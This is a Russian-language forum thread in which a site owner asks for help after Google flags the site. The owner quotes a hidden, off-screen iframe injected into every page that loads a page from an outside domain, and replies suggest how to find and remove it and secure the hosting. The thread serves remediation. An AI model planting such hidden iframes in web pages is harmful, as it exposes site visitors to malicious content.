Jump to content
DELTAKZ

Проблема с сайтом

Recommended Posts

Всем доброго времени суток. Со вчерашнего дня Google  выводит следующую пометку к данному сайту : "Ваш сайт может нанести вред........" Соответственно траф упал процентов на  80. Начал ковырять страницы и увидел что в верху кода каждой страницы встраивается следующая гадость "<div id="modal_wn" style="top: -1280px; width: 340; height: 480; position: absolute; overflow:auto; left: expression(-450*43); z-index: 540; background-color:#ff0000;"><iframe name="ajaxloadbox" align="absmiddle" src ="http://pzbcf.surveywedge.biz/bOc7a_0-40fAd_bH9F318-b5_0ffQ5-63e3_2-8478_79_1.html" title="AjaxShowSlideMenu" width="115" height="390" hspace="11" vspace="9"></iframe></div>

Данный код то появляется, то исчезает, когда он появляется - то шрифт в полной новости, в краткой новости, навигации становится больше. Может кто сталкивался с такой проблемой? Вроде просмотрел везде где только можно, ничего лишнего в коде не нашел.

Если установлена File Zilla, попробуй зайти на хостинг и посмотреть последнюю дату посещения всех файлов, если найдёшь файлы которые открывались без твоего ведома (файлы с момента появления вируса, приблизительную дату) которые заражены, ищи подозрительный скрипт и удаляй его, затем  меняй пароли. Вообщем попробуй поискать деньги заплатить всегда успеешь...

судя по всему, кто-то внедрил в основной файл вашего шаблона посторонний JS скрипт, что-то типа:

<script type="text/javascript" scr="урл распространителя"></script>

Мои версии где это может прятаться:

Wordpress, Ваш шаблон:

header.php

footer.php

DLE:

main.tpl

login.tpl

Joomla

default.php или как-там.

Проверьте все файлы шаблона на посторонние скрипты или URL сайтов.

Попробуйте вот этот бесплатный скрипт  http://www.revisium.com/ai/ Я сам им периодически пользуюсь.

Вспомнил анекдот -"Бросить курить легко - я много раз пробовал"

Удалив весь вредоносный код - вы решите проблему на время, поскольку вы не знаете, кто и как залез к вам на хостинг и это может повториться в любую минуту. Вот здесь и рождается анекдот - "Я сам им периодически пользуюсь"  :)

Вспомнил анекдот -"Бросить курить легко - я много раз пробовал"

Удалив весь вредоносный код - вы решите проблему на время, поскольку вы не знаете, кто и как залез к вам на хостинг и это может повториться в любую минуту. Вот здесь и рождается анекдот - "Я сам им периодически пользуюсь"  :)

Основная масса взломов происходит через зараженный компьютер. Вошли с такого компьютера на свой хостинг и вуаля.  Сперва проверьте компьютер на вирусы - AVZ, Cureit от DrWeb. Если есть деньги лучше обратиться к специалисту, если нет нужно искать выход самостоятельно. В помощь большое количество форумов.

Guest
This topic is now closed to further replies.

• Recently Browsing   0 members

No registered users viewing this page.

• Create New...